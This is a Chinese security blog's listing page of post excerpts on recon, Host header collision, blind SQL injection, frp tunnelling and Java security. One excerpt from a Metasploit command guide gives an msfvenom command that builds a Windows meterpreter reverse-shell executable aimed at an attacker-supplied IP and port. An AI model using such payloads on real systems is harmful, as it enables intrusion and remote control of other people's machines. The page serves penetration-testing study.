上一页 1 2 3 4 5 6 7 8 ··· 12 下一页
摘要: 参数的猜想 1/ The scope of this program was *.███.com With a wildcard, basic recon is: Subdomain Enumeration + HTTP server probing: $ subfinder -d example[ 阅读全文
posted @ 2022-09-30 08:07 菜就多练forever 阅读(182) 评论(0) 推荐(0)
摘要: MSF命令大全详解 0x00 payload生成 windows&linux Windows: msfvenom -p windows/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f exe > 保存路径/文件名 Linux: msfvenom 阅读全文
posted @ 2022-09-16 15:04 菜就多练forever 阅读(614) 评论(0) 推荐(0)
该文被密码保护。 阅读全文
posted @ 2022-08-31 15:35 菜就多练forever 阅读(0) 评论(0) 推荐(0)
摘要: https://github.com/qianniaoge/JavaSecInterview https://github.com/Maskhe/javasec https://github.com/Y4tacker/JavaSec https://github.com/search?q=javaS 阅读全文
posted @ 2022-07-22 09:28 菜就多练forever 阅读(82) 评论(0) 推荐(0)
摘要: 0x00 引言 在渗透测试中,搜集了很多IP资产,端口也开放了WEB服务,但打开总是403 404 400错误,扫目录也扫不到东西。这时候可以尝试利用HOSTS碰撞技术突破其边界对其内网系统进行攻击。 0x01 HOSTS碰撞 什么是HOSTS碰撞,当直接访问IP回显4xx错误,直接指定HOST头为 阅读全文
posted @ 2022-07-13 14:17 菜就多练forever 阅读(267) 评论(0) 推荐(0)
摘要: 涉及技能点 SQL注入基础原理 盲注常用函数及思路 burpsuite基础知识 过程记录 1.发现 在翻阅一EDU站点时,发现路径中带有明显的数字参数 好像与我们平时习惯的xxx.php?id=不同呃 2.尝试注入 按照以往习惯,先用order by探探底,结果翻车了…应该有自定义逻辑在过滤敏感关键 阅读全文
posted @ 2022-07-13 14:02 菜就多练forever 阅读(515) 评论(0) 推荐(0)
摘要: beanshell package cn.ecology; //通过maven导包;去beanshell官网下载假如lib import bsh.Interpreter; /*Interpreter * */ public class TestEval { public static void ma 阅读全文
posted @ 2022-06-13 23:41 菜就多练forever 阅读(621) 评论(0) 推荐(0)
摘要: 1、= = 基本数据类型和引用数据类型都可用 ==左右两边的变量是基本数据类型,比值; ==左右两边的变量是引用数据类型,比地址; 2、equals():只能用在引用数据类型中 equals()左右两边的引用数据类型的变量所在的类中,没有重写Object类继承过来的equals(),那么equals 阅读全文
posted @ 2022-04-19 23:56 菜就多练forever 阅读(183) 评论(0) 推荐(0)
该文被密码保护。 阅读全文
posted @ 2022-04-01 19:24 菜就多练forever 阅读(0) 评论(0) 推荐(0)
摘要: 1.ftp网络穿透简易教程 下载地址 https://github.com/fatedier/frp/blob/dev/README_zh.md 用途 1.端口映射 暂时用不到。也很简单,主要修改客户端配置文件。 参考frpc_full.ini文件。 [common] server_addr = V 阅读全文
posted @ 2022-03-28 16:05 菜就多练forever 阅读(288) 评论(0) 推荐(0)
上一页 1 2 3 4 5 6 7 8 ··· 12 下一页